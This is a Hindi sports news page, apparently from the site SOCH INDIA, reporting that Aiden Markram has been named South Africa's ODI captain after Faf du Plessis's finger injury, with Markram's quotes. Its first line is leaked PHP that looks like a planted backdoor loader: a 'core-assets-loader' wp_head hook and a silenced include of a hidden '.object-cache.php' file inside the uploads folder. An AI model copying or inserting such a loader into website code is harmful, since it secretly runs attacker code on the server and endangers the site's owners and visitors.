add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दबाव से निपटने के लिए तैयार है मार्कराम – SOCH INDIA
Menu

खेल
दबाव से निपटने के लिए तैयार है मार्कराम

nobanner

फाफ डुप्लेसी के चोटिल होने के बाद एडेन मार्कराम को साउथ अफ्रीका का कप्तान बनाया गया है. साउथ अफ्रीकी टीम मैनेजमेंट का यह फैसला बेहद ही चौंकाने वाला है क्योंकि एडेन मार्कराम को वनडे क्रिकेट में सिर्फ दो मैचों का अनुभव है.

टीम की कमान संभाल रहे डुप्लेसी अंगुली में चोट के कारण सीरीज से बाहर हो गये हैं जबकि टीम के दिग्गज खिलाड़ी भी चोट की वजह से पहले तीन वनडे मैचों में नहीं खेलेंगे.

टीम की कप्तानी मिलने के बाद मार्कराम ने कहा, ‘‘ यह बड़ा सम्मान है, चयनकर्ताओं ने मुझ पर इसके लिए भरोसा जताया, यह बड़ी बात है. यह काफी विनम्रता भरा एहसास है, लेकिन हां लेकिन हमें फाफ (डुप्लेसिस) के लिए यह काम करना होगा.’’

उन्होंने कहा, ‘‘ मुझे ऐसा लगता है कि इसे आप हलके में नहीं ले सकते. मै कप्तानी करने का लुत्फ उठाता हूं लेकिन यह एक अलग बात है. जैसा कि मैंने कहा फाफ के साथ दुर्धटना घटी और यह सब जल्दी हो गया.’’

मार्कराम ने कहा कि कप्तानी के लिये उन्होंने डुप्लेसिस से सलाह ली है और मैदान में अमला से समर्थन की उम्मीद करूंगा.